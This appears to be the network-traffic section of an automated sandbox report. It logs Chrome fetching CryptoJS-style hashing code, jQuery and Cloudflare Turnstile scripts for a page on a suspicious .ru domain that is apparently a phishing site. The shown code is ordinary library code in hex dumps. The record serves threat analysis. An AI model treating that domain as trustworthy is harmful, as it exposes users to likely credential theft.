                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74
                                                                  Data Ascii: byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:funct
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54
                                                                  Data Ascii: t(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRST
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68
                                                                  Data Ascii: n(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._h
                                                                  2025-03-14 11:30:39 UTC1369INData Raw: 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d
                                                                  Data Ascii: C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449723104.18.95.414435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:39 UTC718OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:39 UTC386INHTTP/1.1 302 Found
                                                                  Date: Fri, 14 Mar 2025 11:30:39 GMT
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  access-control-allow-origin: *
                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                  cross-origin-resource-policy: cross-origin
                                                                  location: /turnstile/v0/b/c8ec7565fab7/api.js
                                                                  Server: cloudflare
                                                                  CF-RAY: 920370b4cd12adca-EWR
                                                                  alt-svc: h3=":443"; ma=86400


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449722151.101.66.1374435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:39 UTC677OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:39 UTC612INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 89501
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-15d9d"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Age: 620822
                                                                  Date: Fri, 14 Mar 2025 11:30:39 GMT
                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740070-EWR
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 2774, 0
                                                                  X-Timer: S1741951839.478459,VS0,VE1
                                                                  Vary: Accept-Encoding
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                  2025-03-14 11:30:39 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449725104.18.95.414435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:39 UTC702OUTGET /turnstile/v0/b/c8ec7565fab7/api.js HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:40 UTC471INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:40 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 48123
                                                                  Connection: close
                                                                  accept-ranges: bytes
                                                                  last-modified: Wed, 12 Mar 2025 15:12:18 GMT
                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                  access-control-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  Server: cloudflare
                                                                  CF-RAY: 920370b88f094373-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-03-14 11:30:40 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                  Data Ascii: "use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
